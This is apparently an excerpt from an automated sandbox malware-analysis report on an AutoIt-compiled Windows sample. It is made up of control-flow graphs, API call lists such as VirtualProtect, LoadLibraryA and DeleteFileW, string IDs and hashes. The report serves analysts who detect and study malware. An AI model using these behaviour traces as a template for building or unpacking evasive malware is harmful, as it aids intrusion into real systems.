                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                            • String ID: This is a third-party compiled AutoIt script.$runas$%,
                                            • API String ID: 529118366-2593762326
                                            • Opcode ID: 2b8667f917227e0625fc597a12f448c6770a1dad86d20da5124890c9f9edc8d9
                                            • Instruction ID: a14cf4bdfdc4b3b1f463a47e5a362bf0e7fadbaa65b4dee04902fbfd5b828ddf
                                            • Opcode Fuzzy Hash: 2b8667f917227e0625fc597a12f448c6770a1dad86d20da5124890c9f9edc8d9
                                            • Instruction Fuzzy Hash: D551E3B0A2424DAECF11EBB4AC0DAFD7B74EB05790F0041B6F911A21A1CA709B65DF21

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 758 233633-233681 760 233683-233686 758->760 761 2336e1-2336e3 758->761 763 2336e7 760->763 764 233688-23368f 760->764 761->760 762 2336e5 761->762 765 2336ca-2336d2 NtdllDefWindowProc_W 762->765 766 26d31c-26d34a call 2411d0 call 2411f3 763->766 767 2336ed-2336f0 763->767 768 233695-23369a 764->768 769 23375d-233765 PostQuitMessage 764->769 770 2336d8-2336de 765->770 805 26d34f-26d356 766->805 772 2336f2-2336f3 767->772 773 233715-23373c SetTimer RegisterClipboardFormatW 767->773 774 2336a0-2336a2 768->774 775 26d38f-26d3a3 call 292a16 768->775 771 233711-233713 769->771 771->770 777 26d2bf-26d2c2 772->777 778 2336f9-23370c KillTimer call 2344cb call 233114 772->778 773->771 779 23373e-233749 CreatePopupMenu 773->779 780 233767-233776 call 234531 774->780 781 2336a8-2336ad 774->781 775->771 800 26d3a9 775->800 785 26d2c4-26d2c6 777->785 786 26d2f8-26d317 MoveWindow 777->786 778->771 779->771 780->771 788 2336b3-2336b8 781->788 789 26d374-26d37b 781->789 794 26d2e7-26d2f3 SetFocus 785->794 795 26d2c8-26d2cb 785->795 786->771 798 23374b-23375b call 2345df 788->798 799 2336be-2336c4 788->799 789->765 797 26d381-26d38a call 28817e 789->797 794->771 795->799 801 26d2d1-26d2e2 call 2411d0 795->801 797->765 798->771 799->765 799->805 800->765 801->771 805->765 806 26d35c-26d36f call 2344cb call 2343db 805->806 806->765
                                            APIs
                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 002336D2
                                            • KillTimer.USER32(?,00000001), ref: 002336FC
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0023371F
                                            • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0023372A
                                            • CreatePopupMenu.USER32 ref: 0023373E
                                            • PostQuitMessage.USER32(00000000), ref: 0023375F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                            • String ID: TaskbarCreated$%,
                                            • API String ID: 157504867-2061783509
                                            • Opcode ID: 030c66a0fa770ef22fa7d52210a2eeb42d245209a459e89be2c048b966e3c6c0
                                            • Instruction ID: 7bd7b346bb2b44fdab580c2b3f4840133f72e058ea494b5a06336da4ec18e732
                                            • Opcode Fuzzy Hash: 030c66a0fa770ef22fa7d52210a2eeb42d245209a459e89be2c048b966e3c6c0
                                            • Instruction Fuzzy Hash: 1941E7F163010ABBDB14AF38ED0EB797759E700390F140179FA02862A1DAA0AF75DB65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 981 234fe9-235001 CreateStreamOnHGlobal 982 235003-23501a FindResourceExW 981->982 983 235021-235026 981->983 984 235020 982->984 985 26dd5c-26dd6b LoadResource 982->985 984->983 985->984 986 26dd71-26dd7f SizeofResource 985->986 986->984 987 26dd85-26dd90 LockResource 986->987 987->984 988 26dd96-26ddb4 987->988 988->984
                                            APIs
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00234FF9
                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00234EEE,?,?,00000000,00000000), ref: 00235010
                                            • LoadResource.KERNEL32(?,00000000,?,?,00234EEE,?,?,00000000,00000000,?,?,?,?,?,?,00234F8F), ref: 0026DD60
                                            • SizeofResource.KERNEL32(?,00000000,?,?,00234EEE,?,?,00000000,00000000,?,?,?,?,?,?,00234F8F), ref: 0026DD75
                                            • LockResource.KERNEL32(N#,?,?,00234EEE,?,?,00000000,00000000,?,?,?,?,?,?,00234F8F,00000000), ref: 0026DD88
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                            • String ID: SCRIPT$N#
                                            • API String ID: 3051347437-1078319982
                                            • Opcode ID: 793a7df2034277d7c8974ddab0d62103cd9eaa5b4178162f993d6390a5b3fcba
                                            • Instruction ID: c8c22fb99e3debdc05bc8abb45c571368f5e5505a4f9c335bfad8f5f867d9e91
                                            • Opcode Fuzzy Hash: 793a7df2034277d7c8974ddab0d62103cd9eaa5b4178162f993d6390a5b3fcba
                                            • Instruction Fuzzy Hash: 561170B5210701BFD7258F65ED58F677BB9EBC9B51F10826CF809D6260DB72EC108660

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1045 234afe-234b5e call 2377c7 GetVersionExW call 237d2c 1050 234b64 1045->1050 1051 234c69-234c6b 1045->1051 1053 234b67-234b6c 1050->1053 1052 26db90-26db9c 1051->1052 1054 26db9d-26dba1 1052->1054 1055 234b72 1053->1055 1056 234c70-234c71 1053->1056 1058 26dba4-26dbb0 1054->1058 1059 26dba3 1054->1059 1057 234b73-234baa call 237e8c call 237886 1055->1057 1056->1057 1067 234bb0-234bb1 1057->1067 1068 26dc8d-26dc90 1057->1068 1058->1054 1061 26dbb2-26dbb7 1058->1061 1059->1058 1061->1053 1063 26dbbd-26dbc4 1061->1063 1063->1052 1065 26dbc6 1063->1065 1069 26dbcb-26dbce 1065->1069 1067->1069 1070 234bb7-234bc2 1067->1070 1071 26dc92 1068->1071 1072 26dca9-26dcad 1068->1072 1073 234bf1-234c08 GetCurrentProcess IsWow64Process 1069->1073 1074 26dbd4-26dbf2 1069->1074 1079 26dc13-26dc19 1070->1079 1080 234bc8-234bca 1070->1080 1081 26dc95 1071->1081 1075 26dcaf-26dcb8 1072->1075 1076 26dc98-26dca1 1072->1076 1077 234c0a 1073->1077 1078 234c0d-234c1e 1073->1078 1074->1073 1082 26dbf8-26dbfe 1074->1082 1075->1081 1089 26dcba-26dcbd 1075->1089 1076->1072 1077->1078 1090 234c20-234c30 call 234c95 1078->1090 1091 234c89-234c93 GetSystemInfo 1078->1091 1087 26dc23-26dc29 1079->1087 1088 26dc1b-26dc1e 1079->1088 1083 234bd0-234bd3 1080->1083 1084 26dc2e-26dc3a 1080->1084 1081->1076 1085 26dc00-26dc03 1082->1085 1086 26dc08-26dc0e 1082->1086 1092 234bd9-234be8 1083->1092 1093 26dc5a-26dc5d 1083->1093 1095 26dc44-26dc4a 1084->1095 1096 26dc3c-26dc3f 1084->1096 1085->1073 1086->1073 1087->1073 1088->1073 1089->1076 1102 234c32-234c3f call 234c95 1090->1102 1103 234c7d-234c87 GetSystemInfo 1090->1103 1094 234c56-234c66 1091->1094 1098 26dc4f-26dc55 1092->1098 1099 234bee 1092->1099 1093->1073 1101 26dc63-26dc78 1093->1101 1095->1073 1096->1073 1098->1073 1099->1073 1104 26dc82-26dc88 1101->1104 1105 26dc7a-26dc7d 1101->1105 1110 234c41-234c45 GetNativeSystemInfo 1102->1110 1111 234c76-234c7b 1102->1111 1106 234c47-234c4b 1103->1106 1104->1073 1105->1073 1106->1094 1109 234c4d-234c50 FreeLibrary 1106->1109 1109->1094 1110->1106 1111->1110
                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 00234B2B
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            • GetCurrentProcess.KERNEL32(?,002BFAEC,00000000,00000000,?), ref: 00234BF8
                                            • IsWow64Process.KERNEL32(00000000), ref: 00234BFF
                                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 00234C45
                                            • FreeLibrary.KERNEL32(00000000), ref: 00234C50
                                            • GetSystemInfo.KERNEL32(00000000), ref: 00234C81
                                            • GetSystemInfo.KERNEL32(00000000), ref: 00234C8D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                            • String ID:
                                            • API String ID: 1986165174-0
                                            • Opcode ID: 59cd3e631076ac469f03881b3d5deae6004aa83c2d48e1db3db02da43becb824
                                            • Instruction ID: bb93d5fabcf3b48e8e6a0aff0573bf10c1e8db33f241cb13ef3c02683d7a3f9f
                                            • Opcode Fuzzy Hash: 59cd3e631076ac469f03881b3d5deae6004aa83c2d48e1db3db02da43becb824
                                            • Instruction Fuzzy Hash: F391247196A7C4DEC731DF6885511AAFFE5AF2A300F484E9ED0CA83A01D260F958C729

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1172 34f090-34f09d 1173 34f0aa-34f0af 1172->1173 1174 34f0b1 1173->1174 1175 34f0a0-34f0a5 1174->1175 1176 34f0b3 1174->1176 1177 34f0a6-34f0a8 1175->1177 1178 34f0b8-34f0ba 1176->1178 1177->1173 1177->1174 1179 34f0c3-34f0c7 1178->1179 1180 34f0bc-34f0c1 1178->1180 1181 34f0d4-34f0d7 1179->1181 1182 34f0c9 1179->1182 1180->1179 1185 34f0e0-34f0e2 1181->1185 1186 34f0d9-34f0de 1181->1186 1183 34f0f3-34f0f8 1182->1183 1184 34f0cb-34f0d2 1182->1184 1187 34f0fa-34f103 1183->1187 1188 34f10b-34f10d 1183->1188 1184->1181 1184->1183 1185->1178 1186->1185 1189 34f105-34f109 1187->1189 1190 34f17a-34f17d 1187->1190 1191 34f116 1188->1191 1192 34f10f-34f114 1188->1192 1189->1191 1193 34f182-34f185 1190->1193 1194 34f0e4-34f0e6 1191->1194 1195 34f118-34f11b 1191->1195 1192->1191 1198 34f187-34f189 1193->1198 1196 34f0ef-34f0f1 1194->1196 1197 34f0e8-34f0ed 1194->1197 1199 34f124 1195->1199 1200 34f11d-34f122 1195->1200 1202 34f145-34f154 1196->1202 1197->1196 1198->1193 1203 34f18b-34f18e 1198->1203 1199->1194 1201 34f126-34f128 1199->1201 1200->1199 1204 34f131-34f135 1201->1204 1205 34f12a-34f12f 1201->1205 1206 34f164-34f171 1202->1206 1207 34f156-34f15d 1202->1207 1203->1193 1208 34f190-34f1ac 1203->1208 1204->1201 1210 34f137 1204->1210 1205->1204 1206->1206 1212 34f173-34f175 1206->1212 1207->1207 1211 34f15f 1207->1211 1208->1198 1209 34f1ae 1208->1209 1213 34f1b4-34f1b8 1209->1213 1214 34f142 1210->1214 1215 34f139-34f140 1210->1215 1211->1177 1212->1177 1216 34f1ff-34f202 1213->1216 1217 34f1ba-34f1d0 LoadLibraryA 1213->1217 1214->1202 1215->1201 1215->1214 1219 34f205-34f20c 1216->1219 1218 34f1d1-34f1d6 1217->1218 1218->1213 1220 34f1d8-34f1da 1218->1220 1221 34f230-34f260 VirtualProtect * 2 1219->1221 1222 34f20e-34f210 1219->1222 1223 34f1e3-34f1f0 GetProcAddress 1220->1223 1224 34f1dc-34f1e2 1220->1224 1227 34f264-34f268 1221->1227 1225 34f212-34f221 1222->1225 1226 34f223-34f22e 1222->1226 1229 34f1f2-34f1f7 1223->1229 1230 34f1f9 ExitProcess 1223->1230 1224->1223 1225->1219 1226->1225 1227->1227 1228 34f26a 1227->1228 1229->1218
                                            APIs
                                            • LoadLibraryA.KERNEL32(?), ref: 0034F1CA
                                            • GetProcAddress.KERNEL32(?,00348FF9), ref: 0034F1E8
                                            • ExitProcess.KERNEL32(?,00348FF9), ref: 0034F1F9
                                            • VirtualProtect.KERNELBASE(00230000,00001000,00000004,?,00000000), ref: 0034F247
                                            • VirtualProtect.KERNEL32(00230000,00001000), ref: 0034F25C
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                            • String ID:
                                            • API String ID: 1996367037-0
                                            • Opcode ID: d372991fa217411844673beec113e994bdfea18e7d515e1bac542b4a366faa4c
                                            • Instruction ID: 0bf6083790a47723d4d13d4e032bdd6f0080653021f621e42c5462ae3f3843da
                                            • Opcode Fuzzy Hash: d372991fa217411844673beec113e994bdfea18e7d515e1bac542b4a366faa4c
                                            • Instruction Fuzzy Hash: 8F511772A547529FD7229EB8CCC0661B7E4EB91324B2D0739C5E1CF7C6E7A4780A8760
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Dt/$Dt/$Dt/$Dt/$Variable must be of type 'Object'.
                                            • API String ID: 0-1126206128
                                            • Opcode ID: 5e2da88ef55e3c51f41d83de0a017eaeb1e67ca68b76f1d7ced87f2f3f00173d
                                            • Instruction ID: bd9ed2efa6b5c7f37d10623405046632b25b3b39456a54ce12c103ceb94045a7
                                            • Opcode Fuzzy Hash: 5e2da88ef55e3c51f41d83de0a017eaeb1e67ca68b76f1d7ced87f2f3f00173d
                                            • Instruction Fuzzy Hash: E3A28EB4A20206CFCF14DF58D580AADB7B1FF48314F258069E91AAB391D771ED66CB81
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,0026E7C1), ref: 002946A6
                                            • FindFirstFileW.KERNELBASE(?,?), ref: 002946B7
                                            • FindClose.KERNEL32(00000000), ref: 002946C7
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FileFind$AttributesCloseFirst
                                            • String ID:
                                            • API String ID: 48322524-0
                                            • Opcode ID: 9acc0bd95078e6efb3acd1ad9e71ab733b45805a0b305d6e78bc051a30aa32ab
                                            • Instruction ID: fc5272b895b79d9b9eb774d25dd63968102240f15be5655a80718ed2bb37016e
                                            • Opcode Fuzzy Hash: 9acc0bd95078e6efb3acd1ad9e71ab733b45805a0b305d6e78bc051a30aa32ab
                                            • Instruction Fuzzy Hash: 21E0D8714204015B4A107738FC4D8EA779C9E06335F100715F935C14E0E7B059608595
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00240BBB
                                            • timeGetTime.WINMM ref: 00240E76
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00240FB3
                                            • TranslateMessage.USER32(?), ref: 00240FC7
                                            • DispatchMessageW.USER32(?), ref: 00240FD5
                                            • Sleep.KERNEL32(0000000A), ref: 00240FDF
                                            • LockWindowUpdate.USER32(00000000), ref: 0024105A
                                            • DestroyWindow.USER32 ref: 00241066
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00241080
                                            • Sleep.KERNEL32(0000000A,?,?), ref: 002752AD
                                            • TranslateMessage.USER32(?), ref: 0027608A
                                            • DispatchMessageW.USER32(?), ref: 00276098
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002760AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr/$pr/$pr/$pr/
                                            • API String ID: 4003667617-2491227356
                                            • Opcode ID: 33bcd061bc500076c4f942400497130f35f31f43c8aad5283a6c97b814e0a597
                                            • Instruction ID: 6514ceedcc2bd28d4105f3c92bd1f4ed3f9da20fbd3fe598bba976aaab1d2dfb
                                            • Opcode Fuzzy Hash: 33bcd061bc500076c4f942400497130f35f31f43c8aad5283a6c97b814e0a597
                                            • Instruction Fuzzy Hash: C9B29170628752DFD728DF24C884B6AF7E5BF84304F14892DE59987291DBB1E8A4CF42

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 002991E9: __time64.LIBCMT ref: 002991F3
                                              • Part of subcall function 00235045: _fseek.LIBCMT ref: 0023505D
                                            • __wsplitpath.LIBCMT ref: 002994BE
                                              • Part of subcall function 0025432E: __wsplitpath_helper.LIBCMT ref: 0025436E
                                            • _wcscpy.LIBCMT ref: 002994D1
                                            • _wcscat.LIBCMT ref: 002994E4
                                            • __wsplitpath.LIBCMT ref: 00299509
                                            • _wcscat.LIBCMT ref: 0029951F
                                            • _wcscat.LIBCMT ref: 00299532
                                              • Part of subcall function 0029922F: _memmove.LIBCMT ref: 00299268
                                              • Part of subcall function 0029922F: _memmove.LIBCMT ref: 00299277
                                            • _wcscmp.LIBCMT ref: 00299479
                                              • Part of subcall function 002999BE: _wcscmp.LIBCMT ref: 00299AAE
                                              • Part of subcall function 002999BE: _wcscmp.LIBCMT ref: 00299AC1
                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002996DC
                                            • _wcsncpy.LIBCMT ref: 0029974F
                                            • DeleteFileW.KERNEL32(?,?), ref: 00299785
                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0029979B
                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002997AC
                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002997BE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                            • String ID:
                                            • API String ID: 1500180987-0
                                            • Opcode ID: 42fb95b1821f604f84c637fed39a87b92b4d43b850a50b0779dabc48b03966d5
                                            • Instruction ID: d822591204c7287623cdc16c69a61fe34f7afe838cb6fcedcdf82bc9c5180a10
                                            • Opcode Fuzzy Hash: 42fb95b1821f604f84c637fed39a87b92b4d43b850a50b0779dabc48b03966d5
                                            • Instruction Fuzzy Hash: 0CC15CB1D10229AADF21DF99CC85EDEB7BCEF49310F0040AAF609E7151DB709A948F65

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00234864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002F62F8,?,002337C0,?), ref: 00234882
                                              • Part of subcall function 0025074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002372C5), ref: 00250771
                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00237308
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0026ECF1
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0026ED32
                                            • RegCloseKey.ADVAPI32(?), ref: 0026ED70
                                            • _wcscat.LIBCMT ref: 0026EDC9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                            • API String ID: 2673923337-2727554177
